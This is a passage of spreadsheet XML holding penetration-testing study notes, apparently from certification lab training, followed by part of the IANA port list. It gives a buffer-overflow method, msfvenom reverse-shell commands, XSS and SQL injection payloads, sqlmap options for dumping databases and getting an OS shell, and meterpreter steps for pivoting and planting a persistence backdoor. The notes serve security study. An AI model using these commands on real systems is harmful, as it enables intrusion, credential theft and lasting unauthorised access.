    <t>Pointer to the top of the stack</t>
  </si>
  <si>
    <t>EBP</t>
  </si>
  <si>
    <t>Base Pointer</t>
  </si>
  <si>
    <t>Pointer to the base of the stack (aka Stack Base Pointer or Frame pointer)</t>
  </si>
  <si>
    <t>ESI</t>
  </si>
  <si>
    <t>Source Index</t>
  </si>
  <si>
    <t>Used as a pointer to a source in stream operation</t>
  </si>
  <si>
    <t>EDI</t>
  </si>
  <si>
    <t>Destination</t>
  </si>
  <si>
    <t>Used as a pointer to a destination in a stream operation</t>
  </si>
  <si>
    <t>EIP</t>
  </si>
  <si>
    <t>Instruction Pointer</t>
  </si>
  <si>
    <t xml:space="preserve">Controls program execution by storing a pointer to the address of the next instruction (machine code) that will be executed. 
Tells the CPU where the next instruction is. </t>
  </si>
  <si>
    <t>Additional</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">In 64 bit, the E is replaced with an </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">R. </t>
    </r>
  </si>
  <si>
    <t>Process Memory:</t>
  </si>
  <si>
    <t xml:space="preserve">The process is divided into four regions: </t>
  </si>
  <si>
    <t>Text</t>
  </si>
  <si>
    <t xml:space="preserve">Text region or instruction segment is fixed by the program and contains the program code (instructions. </t>
  </si>
  <si>
    <t xml:space="preserve">Divided into initialized data and uinitialized data. </t>
  </si>
  <si>
    <t>Heap</t>
  </si>
  <si>
    <t>Starts after the BSS segment. During execution we can request more space in memory.</t>
  </si>
  <si>
    <t>Stack</t>
  </si>
  <si>
    <t>Refer to next section</t>
  </si>
  <si>
    <t>The Stack</t>
  </si>
  <si>
    <t>Located in the higher part of memory.</t>
  </si>
  <si>
    <t xml:space="preserve">Used to pass functions, store local variables, and saving function return addresses/ locations. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">The </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ESP </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">is used to identify the top of the stack, and it is modifed each time a value is pushed in (PUSH) or popped out (POP). </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">The stack grows downward toward lower memory addresses. </t>
  </si>
  <si>
    <t>The heap grows upward toward higher memory addresses.</t>
  </si>
  <si>
    <t>PUSH Instruction</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PUSH subtracts 4 (32 bit) or 8 (64 bit) from the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ESP </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">and writes the data to the memory address in the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>ESP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> to the top of the stack. </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Subtracts in order to point to a lower memory location on the stack. </t>
  </si>
  <si>
    <t>Process:</t>
  </si>
  <si>
    <t>1. ESP starting point is x (note* the ESP points to the top of the stack)</t>
  </si>
  <si>
    <t>2. PUSH 1 to the stack. So minus 4 from x</t>
  </si>
  <si>
    <t>3. ESP is now x-4</t>
  </si>
  <si>
    <t>POP Instruction</t>
  </si>
  <si>
    <t>POP adds values to the stack. (4 or 8).</t>
  </si>
  <si>
    <t xml:space="preserve">Note that the value popped from the stack is not deleted. It will stay there until another instruction overwrites it. Only the ESP is changed. </t>
  </si>
  <si>
    <t>Stack Frames</t>
  </si>
  <si>
    <t xml:space="preserve">Procedures and functions terminate and then return control to the statement or instruction that called the function. </t>
  </si>
  <si>
    <t xml:space="preserve">The stack consists of logical stack frames (portions of the stack) that are PUSHed when calling a function and POPed when returning a value. Down and up. </t>
  </si>
  <si>
    <t>Prologue</t>
  </si>
  <si>
    <t>mov ebp, esp (move destination, source)</t>
  </si>
  <si>
    <t>move the esp to the position of the ebp</t>
  </si>
  <si>
    <t>Epilogue</t>
  </si>
  <si>
    <t>Little Endian</t>
  </si>
  <si>
    <t xml:space="preserve">Lowest significant bit (LSB) stored at lower memory address. Most Significant Bit (MSB) stored at higher memory address. i.e. 0x12 is lowest, 0x78 is higher memory address. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MSB = in a binary number is the largest value (first from the left). E.g. Binary is </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>00, the MSB is 1</t>
    </r>
  </si>
  <si>
    <r>
      <t>LSB = binary number is the lowest values (first from right). E.g. Binary number 11</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> the LSB is 0. </t>
    </r>
  </si>
  <si>
    <t>Compilers</t>
  </si>
  <si>
    <t>Debuggers</t>
  </si>
  <si>
    <t>Decompilers</t>
  </si>
  <si>
    <t>Finding Buffer Overflows</t>
  </si>
  <si>
    <t>Any application that uses unsafe operations might be vulnerable to BoF.</t>
  </si>
  <si>
    <t>Includes: strcpy, strcat, gets/ fgets, scanf/ fscanf, vsprintf, printf, memcpy</t>
  </si>
  <si>
    <t>Any function that carries out the following may be vuln:
- Does not properly validate inputs before operating
- Does not check input boundaries</t>
  </si>
  <si>
    <t>Fuzzing</t>
  </si>
  <si>
    <t>Testing technique that provides invalid data i.e. Unexpected or random data as input to a program.</t>
  </si>
  <si>
    <t>Findign the EIP/ Offset</t>
  </si>
  <si>
    <t>pattern_create and pattern_offset</t>
  </si>
  <si>
    <t>Overwriting the EIP</t>
  </si>
  <si>
    <t xml:space="preserve">PTP slide 3.3.2 - Overwiritng the EIP is important. </t>
  </si>
  <si>
    <t>Remember, when writing our hexadecimal values in the exploit program, we need to write it in little endian (backwards) if on win system...</t>
  </si>
  <si>
    <t>Buffer overflow</t>
  </si>
  <si>
    <t>Steps</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Fuzz</t>
  </si>
  <si>
    <t xml:space="preserve">Submit increasing data to the application until it breaks. Use fuzz.py. You may not be able to automate this, in which case use break.py. Get a rough idea of the size of the overflow. Try to be as accurate as you can - submitting too much data may not cause the conditions that you want.
You have achieved this step when the EIP is overwritten with your junk data (AAAA = 41414141).
</t>
  </si>
  <si>
    <t>Control the EIP</t>
  </si>
  <si>
    <t xml:space="preserve">Use the following commands to identify the size of the buffer.
msf-pattern_create -l &lt;length&gt; 
msf-pattern_offset -l &lt;length&gt; -q &lt;eip_reading&gt;
This will create a unique string of a given length so you can find exactly where the EIP sits in your overflow. Once you've got your offset, submit buffer A's, then 4x B's so you can see your EIP control (BBBB = 42424242).
</t>
  </si>
  <si>
    <t>Determine space for shellcode</t>
  </si>
  <si>
    <t xml:space="preserve">Write buffer A's, 4x EIP B's, then about 500 C's to see if you have enough space to write your shellcode in after your overflow.
</t>
  </si>
  <si>
    <t>If you only have a small amount of space, you can try punching through to the next section of memory by adding another 200 C's (700 total) and seeing if you have room.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">If you only have a small amount of space, you might need to get creative. Consider making your shellcode </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>part</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> of your buffer (in the A's). You could then use your small amount of shellcode space to insert another jumpcode, eg:
Buffer (NOP sled + shellcode + junk) --&gt; EIP (JMP ESP) --&gt; Little space (NOP sled + JMP ECX [FF e1])
That's assumping that your buffer is at ECX. This worked for me in the PWK labs.
</t>
    </r>
  </si>
  <si>
    <t>Identify bad characters</t>
  </si>
  <si>
    <t>Put every character from x00 to xFF into the space after your EIP, then check the crash and see which ones were not written into memory. This could be a tedious process if you don't have much space. Remember that it will stop writing at the first bad character, so you may need to repeat this step a number of times.</t>
  </si>
  <si>
    <t>Find JMP ESP</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">As the EIP points to a location in memory and doesn't </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>read</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> memory, you need to find a place in memory that reads JMP ESP (or whatever you're using), that's going to reliably be there. Something without memory protections (ASLR, DEP, etc).
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">In Immunity debugger (Windows based), you can use the mona module with:
!mona modules
!mona find -s "\xff\xe4" -m &lt;module&gt;
</t>
  </si>
  <si>
    <t>Modules shows modules in memory. Find one without memory protection.
FFE4 is the opcode for JMP ESP.</t>
  </si>
  <si>
    <t xml:space="preserve">In Evans Debugger (Linux based), you can use Opcodesearcher
Plugins &gt; OpcodeSearcher
</t>
  </si>
  <si>
    <t>Write the jump and test it</t>
  </si>
  <si>
    <t xml:space="preserve">Once you have the location of your jump point, write it in to your exploit over the BBBB so it gets written into the EIP. Remember to write the memory location in little endian.
Set a breakpoint on that position in memory (the JMP ESP) and run your exploit to make sure you're hitting it.
</t>
  </si>
  <si>
    <t>Generate shellcode</t>
  </si>
  <si>
    <t xml:space="preserve">msfvenom -p windows/shell_reverse_tcp LHOST=&lt;kali_ip&gt; LPORT=&lt;port&gt; –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x2b\" -f py -v shellcode
msfvenom -p linux/x86/shell_reverse_tcp LHOST=&lt;kali_ip&gt; LPORT=&lt;port&gt; -b "\x00\x20" -f py -v shellcode
</t>
  </si>
  <si>
    <t>-b is for bad characters - adjust as needed.
Try with and without encoder (shikata_ga_nai) if you have trouble with size/bad characters.</t>
  </si>
  <si>
    <t>Insert shellcode into exploit, and run</t>
  </si>
  <si>
    <t xml:space="preserve">Onwards to great victory.
</t>
  </si>
  <si>
    <t>General notes:</t>
  </si>
  <si>
    <t xml:space="preserve">Memory:
Low memory address --&gt; Higher memory address
Stack --&gt; Program image --&gt; Process Environment Block (PEB) --&gt; Thread Environment Block (TEB) --&gt; Heap
Dynamic Link Library (DLL) 
Kernel memory space
</t>
  </si>
  <si>
    <t xml:space="preserve">CPU registers
9x 32bit registers (on 32bit arch obvs). EAX = Extended AX (from 16 bit). Letters defines primary register usage, with X meaning ‘I don’t need a second letter to describe this’, probably.
EAX (Accumulator):	Arithmetic and logical operations
EBX (Base):		Base pointer for memory addresses
ECX (Counter):		Loop, shift, and rotation counter
EDX (Data):		I/O port addressing, multiplication, and division
ESI (Source index):	Pointer addressing of data and source in string copy operations
EDI (Destination index):	Pointer addressing of data and destination in string copy operations
ESP (Stack pointer):	Keeps track of the top of the stack by storing the mem address (lower memory)
EBP (Base pointer):	Keep track of the bottom of the stack by storing the mem address (higher memory)
EIP (Instruction pointer): 	Points to the memory address of the next instruction to be executed.
</t>
  </si>
  <si>
    <t>Step ID</t>
  </si>
  <si>
    <t>Step</t>
  </si>
  <si>
    <t>Tools/ Commands</t>
  </si>
  <si>
    <t xml:space="preserve">Testing XSS </t>
  </si>
  <si>
    <t>1. Detect the input vectors
2. Analyse the insertion point
3. Check filters (&lt;&gt; / )
4. Exploiting</t>
  </si>
  <si>
    <t>Testing XSS - DOM</t>
  </si>
  <si>
    <r>
      <t>DOM XSS occurs when input is processed by DOM functions and only after that is it rendered by the browser. It is processed by DOM functions before being printed out in the response HTML. 
Use the below test if DOM XSS is present:
site.xyz/hello.php?name=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">&lt;img src='anything' onerror="alert('XSS');" /&gt; </t>
    </r>
  </si>
  <si>
    <t>Testing XSS - Stored</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Occurs when malicious code is stored on the server. 
Simply input the below into a comment section/ form etc:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;script&gt;alert('hello')&lt;/script&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Testing XSS - Reflected</t>
  </si>
  <si>
    <t xml:space="preserve">Only reflected to a victim. 
Same as above. </t>
  </si>
  <si>
    <t>Enumerate the Web Application/ Find Injection Points</t>
  </si>
  <si>
    <t>1. Run a spider on the webapp using burpsuite
2. Locate .php or other backend extensions that either:
- POST
- GET
*Note: Even if the is no input parameter in the url (?id=), there still may be an injection point in the:
- Cookie
- User agent string
- Referer 
- Literally any other header value that the web app could process i.e. input and output
in the header of the request.</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">In Burpsuite -&gt; add the site to the target scope 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>LOOK INTO REST API INJECTIONS WITH SQLMAP</t>
    </r>
  </si>
  <si>
    <t>Test Injection Point for Type (GET)</t>
  </si>
  <si>
    <t xml:space="preserve">1. In burpsuite, send the request to Repeater. 
2. Test for SQL injection via:
a) id or other GET parameter: 
Try a single ' after the ?id=. If we get an error -&gt; good. Try ?id=9999 OR 1=1 -&gt; if we get a valid response - good. Send to SQLMap
b) User-Agent:
Try a single ' in the header field. Check the response. Try a valid request i.e. with your actual user agent or a TRUE boolean statement (User-agent: ' OR 'a'='a) If different, good. Send to SQLMap (most likely blind sql if a union select does not give us results)
c) Cookie header: Same as above. </t>
  </si>
  <si>
    <t>REALLY USEFUL SITE:
https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
The above site has a list of all strings we can use to confirm sql injection
https://pentest-tools.com/blog/sql-injection-attacks/</t>
  </si>
  <si>
    <t>Test Injection Point for Type (POST)</t>
  </si>
  <si>
    <t xml:space="preserve">Typically found in forms such as login forms etc.
1. Fill in random fields and send the request to Repeater in burpsuite.
2. Should see a post field at the very bottom of the request. 
3. Use these values in SQLMap. </t>
  </si>
  <si>
    <t>SQLMap - GET</t>
  </si>
  <si>
    <t xml:space="preserve">Once identified a vulnerable GET parameter, we can use sqlmap to automatically do the work for us. 
sqlmap -u "&lt;url /x.php (include ?id=&lt;anyvalue&gt; if an input parameter is present&gt;  
--dbs = list all databases available
--tables = list all tables
--columns= list all columns in the selected table
--dump = dump all the data 
-T = "&lt;table_name&gt;"
-C = "&lt;column_name&gt;"
-D = "&lt;database_name&gt;"
i.e. list all data in a column -&gt; -C "column_name" --dump
Include the below if relevant: Can be used for both GET and POST
--technique=X ; X can be B (Boolean based), U (UNION). Usually sqlmap will automatically identify this. 
--level=1-5 ; use 5 to test all header values used in the get request. This will automatically find if a uas, cookie is vulnerable. 
--keep-alive ; use to ensure the connection to the db is kept alive. Use everytime recommended
--dbms ; specify the database in use (mysql, mssql etc.)
--banner ; grab the db name/ version
--risk 1-5 ; determine the risk level i.e. how quick u want to dump
--threads="1-10" ; 10 is max
--passwords = automatically dump the database user credentials (not the actual apps users)
--dump-all = dumps everything stored on the database
--users = gets users in the database
--file-read=&lt;FILE&gt; -&gt; i.e. --file-read=/etc/passwd -&gt; get all the passwd hashes on the server
--privileges -&gt; shows current permissions
--cooke "" -&gt; if you are already logged into the app, you will need to include the cookie from the burpsuite request. 
--current-user -&gt; get the current user of the db
</t>
  </si>
  <si>
    <t xml:space="preserve">https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
https://medium.com/@hari.namburi/sqlmap-101-701fe40c662a
</t>
  </si>
  <si>
    <t>SQLMap - POST</t>
  </si>
  <si>
    <t xml:space="preserve">sqlmap -u "&lt;url only/x.php&gt;" 
--data='&lt;this is where the post parameters go i.e. username=test&amp;password=test&amp;submit=Login&gt;' -&gt; we can just copy/ paste this from burpsuite 
-p &lt;parameter i.e. username&gt; -&gt; can do username,password
--suffix='; --' -&gt; what you want to put at the end of the query (sometimes required). Just use all the time. </t>
  </si>
  <si>
    <t>SQLMap - Upload Webshell</t>
  </si>
  <si>
    <t xml:space="preserve">We can upload a webshell if our current user has WRITE privs. To create a webshell PHP script, we need a directory with write permission turned on
sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --dbs --os-shell
--os-shell gives us a shell
IF this does not work do the below:
</t>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/
https://cyberbotnet.com/2020-04-09/Upload-Web-Shell-Using-SQLmap</t>
  </si>
  <si>
    <t>Cracking DB Hashes</t>
  </si>
  <si>
    <t>All modern dbs store passwords in hash. 
1. Find the password hashes for the DATABASE and the application (if u want). We want the database user creds so we can connect directly to the db. 
2. Find the database in use. 
3. Use John the Ripper (use GPU mode) and the relevant db hash format to crack OR
use</t>
  </si>
  <si>
    <t>https://dev.mysql.com/doc/refman/5.5/en/password-hashing.html
https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/</t>
  </si>
  <si>
    <t>Test for In-Band Injection (manual)</t>
  </si>
  <si>
    <t xml:space="preserve">1. Try a valid request
?id=1
2. Try an invalid request (check tools)
?id='
If we get an error, UNION based or error based sqli is present.
AT THIS POINT, WE KNOW SQL INJECTION IS POSSIBLE, SO MOVE ONTO SQLMAP UNLESS SQLMAP DOES NOT WORK. 
3. Try a UNION request
test.php?id=&lt;invalid_figure&gt; UNION SELECT null; --
If we do not get an invalid response i.e. the products column is not filled, but an error it may be an error based injection. 
If we get invalid number of columns, increase the null until we get a valid response.
Once confirmed the number of columns, add an integer in place of the first null. If get error, try a string. 
At this point, we can either use SQLMAP or further enumerate the db by using a cheatsheet relevant to the database type (i.e. mysql) being used. Input the SELECT statements after the UNION into the relevant 'null' fields. </t>
  </si>
  <si>
    <t xml:space="preserve">Test for injection:
- String terminators: ' and "
- SQL Commands: SELECT, UNION
- SQL comments: # or -- - </t>
  </si>
  <si>
    <t>Test for Error Based Injection (manual)</t>
  </si>
  <si>
    <t xml:space="preserve">1. In the injection point, try 
?id=&lt;invalid_figure&gt; OR 1 IN (SELECT TOP 1 CAST (@@version as varchar(4096))) -- 
The above tests the db version. We </t>
  </si>
  <si>
    <t xml:space="preserve">Errors could be embedded into an email message or appended to a log file. </t>
  </si>
  <si>
    <t>Test for Blind Injection (manual)</t>
  </si>
  <si>
    <t xml:space="preserve">1. If no error is shown and the In-Band technique does not work. It may be blind sql. 
2. Test a valid TRUE condition:
?id= ' OR 'a'='a
3. Test a FALSE condition:
?id= ' OR 'a'='b 
If we get differing results, but valid responses, we have blind sqli.
Send to sqlmap </t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Commands</t>
  </si>
  <si>
    <t>Gain meterpreter shell on target</t>
  </si>
  <si>
    <t>We want to gain SYSTEM or higher privs as most meterpreter commands need this
Consider bypassing UAC script if getsystem does not work</t>
  </si>
  <si>
    <t>Enable autoroute</t>
  </si>
  <si>
    <t>Add a route from attacker box to compromised box.
This will help with scanning targets our machine cannot hit, but our compromised machine can. i.e. Machines sitting outside of the compromised machine subnet.</t>
  </si>
  <si>
    <t>meterpreter &gt; autoroute -s &lt;subnet&gt;</t>
  </si>
  <si>
    <t>Map the internal network</t>
  </si>
  <si>
    <t xml:space="preserve">We need to find new devices in the internal network for further access. 
Run arp scanner, ping sweep, netstat etc
Run port scans on the targets found. 
</t>
  </si>
  <si>
    <t>arp_scanner</t>
  </si>
  <si>
    <t>Data Harvesting (current box)</t>
  </si>
  <si>
    <t xml:space="preserve">Determine what services are running on the compromised host.
Try and locate config files (wp-config), navigate to websites, search for creds.
From services found, run meterpreter enum scripts relating to those services on the target machine. </t>
  </si>
  <si>
    <t>enum_applications</t>
  </si>
  <si>
    <t>Maintain persistence</t>
  </si>
  <si>
    <t xml:space="preserve">Before exploiting other machines, upload a backdoor to maintain persistence on the current box. 
In case something happens. </t>
  </si>
  <si>
    <t>meterpreter persisence script</t>
  </si>
  <si>
    <t>Enable portfwd</t>
  </si>
  <si>
    <t>For any services we find on machines outside of our compromised box subnet ie. Comp box = 10.120 and other machine = 10.121, we need to add a portfwd in order to access services. 
In meterpreter add a prot fwd hitting the target port on the machine routing through our compromised box. 
We can now connect directly to the machine i.e. through telnet 23, mysql etc...</t>
  </si>
  <si>
    <t>meterpreter &gt; portfwd</t>
  </si>
  <si>
    <t>Exploit new machines</t>
  </si>
  <si>
    <t>We may need to enable RDP on our current compromised host in order to access other services on the internal network such as ftp clients etc. 
Create a new user and give the user access to the RDP group. Can use this to log into RDP</t>
  </si>
  <si>
    <t>get gui -e</t>
  </si>
  <si>
    <t>Can be done via uploading backdoors, exploiting telnet, etc.</t>
  </si>
  <si>
    <t>Repeat the cyle</t>
  </si>
  <si>
    <t xml:space="preserve">Harvest, persist, autoroute, etc. </t>
  </si>
  <si>
    <t>Linux Priv Esc Techniques (What to try first)</t>
  </si>
  <si>
    <t>Find ssh keys</t>
  </si>
  <si>
    <t xml:space="preserve">/home/&lt;user&gt;/.ssh/&lt;keys&gt;
Cat the id_rsa key. 
Copy the key to attk station
Use ssh2john python script
Use john to crack the hash 
john --wordlist=&lt;rokyou.txt&gt; &lt;file&gt;
Will get a password
ssh -i id_rsa user@&lt;ip&gt; 
</t>
  </si>
  <si>
    <t>find / -perm -4000 -type 2&gt;/dev/null</t>
  </si>
  <si>
    <t>Exploit suggester</t>
  </si>
  <si>
    <t>try dirty cow etc.
Host a python server.
Find what directory u can write to on target box</t>
  </si>
  <si>
    <t>Pivoting</t>
  </si>
  <si>
    <t>Service Name</t>
  </si>
  <si>
    <t>Port Number</t>
  </si>
  <si>
    <t>Transport Protocol</t>
  </si>
  <si>
    <t>Assignee</t>
  </si>
  <si>
    <t>Contact</t>
  </si>
  <si>
    <t>Registration Date</t>
  </si>
  <si>
    <t>Modification Date</t>
  </si>
  <si>
    <t>Reference</t>
  </si>
  <si>
    <t>Service Code</t>
  </si>
  <si>
    <t>Unauthorized Use Reported</t>
  </si>
  <si>
    <t>Assignment Notes</t>
  </si>
  <si>
    <t>65536 ports all up</t>
  </si>
  <si>
    <t>tcp</t>
  </si>
  <si>
    <t>Reserved</t>
  </si>
  <si>
    <t>[Jon_Postel]</t>
  </si>
  <si>
    <t>udp</t>
  </si>
  <si>
    <t>tcpmux</t>
  </si>
  <si>
    <t>TCP Port Service Multiplexer</t>
  </si>
  <si>
    <t>[Mark_Lottor]</t>
  </si>
  <si>
    <t>compressnet</t>
  </si>
  <si>
    <t>Management Utility</t>
  </si>
  <si>
    <t>Compression Process</t>
  </si>
  <si>
    <t>[Bernie_Volz]</t>
  </si>
  <si>
    <t>Unassigned</t>
  </si>
  <si>
    <t>rje</t>
  </si>
  <si>
    <t>Remote Job Entry</t>
  </si>
  <si>
    <t>echo</t>
  </si>
  <si>
    <t>Echo</t>
  </si>
  <si>
    <t>discard</t>
  </si>
  <si>
    <t>Discard</t>
  </si>
  <si>
    <t>sctp</t>
  </si>
  <si>
    <t>[Randall_Stewart]</t>
  </si>
  <si>
    <t>[RFC4960]</t>
  </si>
  <si>
    <t>dccp</t>
  </si>
  <si>
    <t>[Eddie_Kohler]</t>
  </si>
  <si>
    <t>[RFC4340]</t>
  </si>
  <si>
    <t>systat</t>
  </si>
  <si>
    <t>Active Users</t>
  </si>
  <si>
    <t>daytime</t>
  </si>
  <si>
    <t>Daytime</t>
  </si>
  <si>
    <t>[RFC867]</t>
  </si>
  <si>
    <t>Unassigned [was netstat]</t>
  </si>
  <si>
    <t>qotd</t>
  </si>
  <si>
    <t>Quote of the Day</t>
  </si>
  <si>
    <t>msp</t>
  </si>
  <si>
    <t>Message Send Protocol (historic)</t>
  </si>
  <si>
    <t>[Rina_Nethaniel]</t>
  </si>
  <si>
    <t>chargen</t>
  </si>
  <si>
    <t>Character Generator</t>
  </si>
  <si>
    <t>ftp-data</t>
  </si>
  <si>
    <t>File Transfer [Default Data]</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>ftp</t>
  </si>
  <si>
    <t>File Transfer Protocol [Control]</t>
  </si>
  <si>
    <t>[RFC959]</t>
  </si>
  <si>
    <t>Defined TXT keys: u=&lt;username&gt; p=&lt;password&gt; path=&lt;path&gt;</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>The Secure Shell (SSH) Protocol</t>
  </si>
  <si>
    <t>[RFC4251]</t>
  </si>
  <si>
    <t>Defined TXT keys: u=&lt;username&gt; p=&lt;password&gt;</t>
  </si>
  <si>
    <t>Telnet</t>
  </si>
  <si>
    <t>[RFC854]</t>
  </si>
  <si>
    <t>any private mail system</t>
  </si>
  <si>
    <t>[Rick_Adams]</t>
  </si>
  <si>
    <t>smtp</t>
  </si>
  <si>
    <t>Simple Mail Transfer</t>
  </si>
  <si>
    <t>[IESG]</t>
  </si>
  <si>
    <t>[IETF_Chair]</t>
  </si>
  <si>
    <t>[RFC5321]</t>
  </si>
  <si>
    <t>nsw-fe</t>
  </si>
  <si>
    <t>NSW User System FE</t>
  </si>
  <si>
    <t>[Robert_Thomas]</t>
  </si>
  <si>
    <t>msg-icp</t>
  </si>
  <si>
    <t>MSG ICP</t>
  </si>
  <si>
    <t>msg-auth</t>
  </si>
  <si>
    <t>MSG Authentication</t>
  </si>
  <si>
    <t>dsp</t>
  </si>
  <si>
    <t>Display Support Protocol</t>
  </si>
  <si>
    <t>[Ed_Cain]</t>
  </si>
  <si>
    <t>any private printer server</t>
  </si>
  <si>
    <t>time</t>
  </si>
  <si>
    <t>Time</t>
  </si>
  <si>
    <t>rap</t>
  </si>
  <si>
    <t>Route Access Protocol</t>
  </si>
  <si>
    <t>[Robert_Ullmann]</t>
  </si>
  <si>
    <t>rlp</t>
  </si>
  <si>
    <t>Resource Location Protocol</t>
  </si>
  <si>
    <t>[Mike_Accetta]</t>
  </si>
  <si>
    <t>graphics</t>
  </si>
  <si>
    <t>Graphics</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>Host Name Server</t>
  </si>
  <si>
    <t>nameserver</t>
  </si>
  <si>
    <t>nicname</t>
  </si>
  <si>
    <t>Who Is</t>
  </si>
  <si>
    <t>mpm-flags</t>
  </si>
  <si>
    <t>MPM FLAGS Protocol</t>
  </si>
  <si>
    <t>mpm</t>
  </si>
  <si>
    <t>Message Processing Module [recv]</t>
  </si>
  <si>
    <t>mpm-snd</t>
  </si>
  <si>
    <t>MPM [default send]</t>
  </si>
  <si>
    <t>This entry has been removed on 2017-05-18.</t>
  </si>
  <si>
    <t>auditd</t>
  </si>
  <si>
    <t>Digital Audit Daemon</t>
  </si>
  <si>
    <t>[Larry_Scott]</t>
  </si>
  <si>
    <t>tacacs</t>
  </si>
  <si>
    <t>Login Host Protocol (TACACS)</t>
  </si>
  <si>
    <t>[Pieter_Ditmars]</t>
  </si>
  <si>
    <t>re-mail-ck</t>
  </si>
  <si>
    <t>Remote Mail Checking Protocol</t>
  </si>
  <si>
    <t>[Steve_Dorner]</t>
  </si>
  <si>
    <t>This entry is being removed on 2013-05-24.</t>
  </si>
  <si>
    <t>xns-time</t>
  </si>
  <si>
    <t>XNS Time Protocol</t>
  </si>
  <si>
    <t>[Susie_Armstrong]</t>
  </si>
  <si>
    <t>domain</t>
  </si>
  <si>
    <t>Domain Name Server</t>
  </si>
  <si>
    <t>[Paul_Mockapetris]</t>
  </si>
  <si>
    <t>xns-ch</t>
  </si>
  <si>
    <t>XNS Clearinghouse</t>
  </si>
  <si>
    <t>isi-gl</t>
  </si>
  <si>
    <t>ISI Graphics Language</t>
  </si>
  <si>
    <t>xns-auth</t>
  </si>
  <si>
    <t>XNS Authentication</t>
  </si>
  <si>
    <t>any private terminal access</t>
  </si>
  <si>
    <t>xns-mail</t>
  </si>
  <si>
    <t>XNS Mail</t>
  </si>
  <si>
    <t>any private file service</t>
  </si>
  <si>
    <t>acas</t>
  </si>
  <si>
    <t>ACA Services</t>
  </si>
  <si>
    <t>[E_Wald]</t>
  </si>
  <si>
